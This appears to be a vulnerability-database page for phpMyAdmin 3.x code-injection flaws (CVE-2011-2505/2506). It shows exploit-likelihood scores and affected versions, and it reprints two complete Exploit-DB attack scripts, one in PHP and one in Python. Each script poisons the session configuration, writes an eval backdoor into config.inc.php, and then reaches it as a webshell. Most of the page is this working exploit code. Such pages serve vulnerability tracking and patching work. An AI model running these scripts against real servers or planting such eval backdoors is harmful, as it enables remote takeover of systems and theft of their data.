Related Weaknesses
CWE-ID
Weakness Name
Source
CWE-94
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date EPSS V0 EPSS V1 EPSS V2 (> 2022-02-04) EPSS V3 (> 2025-03-07) EPSS V4 (> 2025-03-17) 2022-02-06 – – 4.36% – – 2022-04-03 – – 4.36% – – 2022-09-25 – – 4.36% – – 2023-03-12 – – – 36.22% – 2023-03-26 – – – 36.22% – 2023-06-11 – – – 29.77% – 2023-11-12 – – – 25.67% – 2024-01-14 – – – 19.87% – 2024-06-02 – – – 19.87% – 2024-12-15 – – – 19.87% – 2024-12-22 – – – 26.35% – 2025-01-19 – – – 26.35% – 2025-03-18 – – – – 36.9% 2025-04-06 – – – – 28.63% 2025-04-06 – – – – 28.63,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Date Percentile 2022-02-06 71% 2022-04-03 87% 2022-09-25 88% 2023-03-12 96% 2023-03-26 97% 2023-06-11 96% 2023-11-12 96% 2024-01-14 96% 2024-06-02 96% 2024-12-15 97% 2024-12-22 97% 2025-01-19 97% 2025-03-18 97% 2025-04-06 96% 2025-04-06 96%
Exploit information
Exploit Database EDB-ID : 17514
Publication date : 2011-07-08 22h00 +00:00
Author : Mango
EDB Verified : Yes
<?php /*
# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
# Date: 2011-07-09
# Author: Mango of ha.xxor.se
# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
# CVE : CVE-2011-2505, CVE-2011-2506
# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
*/
echo php_sapi_name()!=='cli'?'<pre>':'';?>
.
, )\ .
. ,/) , / ) , )\
)\( /)/( (__( /( / ) __ __ ________ __ __
/ \ ( )| |) \ / | |\ /| | | | | | | | (__)
( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____
\| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | |
| |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|
==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]==============
phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []
Remote Code Injection [] [][] [] [] [] [] [] []
http://ha.xxor.se [][] [] [] [] [][] [][] [] []
_ _ ___ __ ____ __ ___ ___
| |-| || _ |\ /\ /| _ || )
|_|-|_||_|_|/_._\/_._\|___||_|_\
___ ___ ___ _ _ ___ ___ __ __
( < | [_ / /| || || )(_)| |\ | /
>__)|_[_ \__\|____||_|_\|_| |_| |_|
Use responsibly.
<?php echo php_sapi_name()!=='cli'?'</pre>':'';
if(php_sapi_name()==='cli'){
if(!isset($argv[1])){
output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
killme();
}
$pmaurl = $argv[1];
}else{
$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token = null;
if(!function_exists('curl_init')){
output('[!] Fatal error. Need cURL!');
killme();
}
$ch = curl_init();
$debug = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))killme(true);
}
output("[i] Running...");
// Start a session and get a token
curl_setopt_array($ch, array(
CURLOPT_URL => $pmaurl.'/setup/index.php',
CURLOPT_HEADER => 1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 4,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrive session cookie and token.");
$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
killme();
}
if(!$result){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
killme();
}
// Extract cookie
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);
// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
//echo htmlspecialchars($result,ENT_QUOTES);
// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
//echo htmlspecialchars($result,ENT_QUOTES);
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
}
curl_close($ch);
function output($msg){
echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
flush();
}
function killme(){
output("[*] Exiting...");
echo php_sapi_name()!=='cli'?'<pre>':'';
die();
}
echo php_sapi_name()!=='cli'?'<pre>':'';?>
Exploit Database EDB-ID : 17510
Publication date : 2011-07-07 22h00 +00:00
Author : wofeiwo
EDB Verified : Yes
#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo<wofeiwo@80sec.com>
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################
# Requirements: 1. "config" directory must created&writeable in pma directory.
# 2. session.auto_start = 1 in php.ini configuration.
import os,sys,urllib2,re
def usage(program):
print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
execute exploit"
print "Usage: %s <PMA_url>" % program
print "Example: %s http://www.test.com/phpMyAdmin" % program
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
if args[1][-1] == "/":
args[1] = args[1][:-1]
# ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�
print "[+] Trying get form token&session_id.."
content = urllib2.urlopen(args[1]+"/index.php").read()
r1 = re.findall("token=(\w{32})", content)
r2 = re.findall("phpMyAdmin=(\w{32,40})", content)
if not r1:
r1 = re.findall("token\" value=\"(\w{32})\"", content)
if not r2:
r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
if len(r1) < 1 or len(r2) < 1:
print "[-] Cannot find form token and session id...exit."
sys.exit(-1)
token = r1[0]
sessionid = r2[0]
print "[+] Token: %s , SessionID: %s" % (token, sessionid)
# �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ
print "[+] Trying to insert payload in $_SESSION.."
uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
url = args[1]+uri
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;
pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %
(sessionid, sessionid)))
urllib2.install_opener(opener)
urllib2.urlopen(url)
# ����setup��ȡshell
print "[+] Trying get webshell.."
postdata =
"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"
% (sessionid, token)
url = args[1]+"/setup/config.php"
# print "[+]Postdata: %s" % postdata
urllib2.urlopen(url, postdata)
print "[+] All done, pray for your lucky!"
# ���IJ����������shell
url = args[1]+"/config/config.inc.php"
opener.addheaders.append(('Code', 'phpinfo();'))
urllib2.install_opener(opener)
print "[+] Trying connect shell: %s" % url
result = re.findall("System \</td\>\<td
class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
if len(result) == 1:
print "[+] Lucky u! System info: %s" % result[0]
print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
else:
print "[-] Cannot get webshell."
except Exception, e:
print e
if __name__ == "__main__" : main(sys.argv)
Products Mentioned
Configuraton 0 Phpmyadmin>>Phpmyadmin >> Version 3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.0.1
Phpmyadmin>>Phpmyadmin >> Version 3.0.1
Phpmyadmin>>Phpmyadmin >> Version 3.0.1.1
Phpmyadmin>>Phpmyadmin >> Version 3.1.0
Phpmyadmin>>Phpmyadmin >> Version 3.1.0
Phpmyadmin>>Phpmyadmin >> Version 3.1.1
Phpmyadmin>>Phpmyadmin >> Version 3.1.1
Phpmyadmin>>Phpmyadmin >> Version 3.1.2
Phpmyadmin>>Phpmyadmin >> Version 3.1.2
Phpmyadmin>>Phpmyadmin >> Version 3.1.3
Phpmyadmin>>Phpmyadmin >> Version 3.1.3
Phpmyadmin>>Phpmyadmin >> Version 3.1.3.1
Phpmyadmin>>Phpmyadmin >> Version 3.1.3.2
Phpmyadmin>>Phpmyadmin >> Version 3.1.4
Phpmyadmin>>Phpmyadmin >> Version 3.1.4
Phpmyadmin>>Phpmyadmin >> Version 3.1.5
Phpmyadmin>>Phpmyadmin >> Version 3.1.5
Phpmyadmin>>Phpmyadmin >> Version 3.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.2.1
Phpmyadmin>>Phpmyadmin >> Version 3.2.1
Phpmyadmin>>Phpmyadmin >> Version 3.2.2
Phpmyadmin>>Phpmyadmin >> Version 3.2.2
Phpmyadmin>>Phpmyadmin >> Version 3.3.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.1.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.3.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.4.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.5.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.5.1
Phpmyadmin>>Phpmyadmin >> Version 3.3.6
Phpmyadmin>>Phpmyadmin >> Version 3.3.7
Phpmyadmin>>Phpmyadmin >> Version 3.3.8
Phpmyadmin>>Phpmyadmin >> Version 3.3.8.1
Phpmyadmin>>Phpmyadmin >> Version 3.3.9.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.9.1
Phpmyadmin>>Phpmyadmin >> Version 3.3.9.2
Phpmyadmin>>Phpmyadmin >> Version 3.3.10.0
Phpmyadmin>>Phpmyadmin >> Version 3.3.10.1
Configuraton 0 Phpmyadmin>>Phpmyadmin >> Version 3.4.0.0
Phpmyadmin>>Phpmyadmin >> Version 3.4.1.0
Phpmyadmin>>Phpmyadmin >> Version 3.4.2.0
Phpmyadmin>>Phpmyadmin >> Version 3.4.3.0
References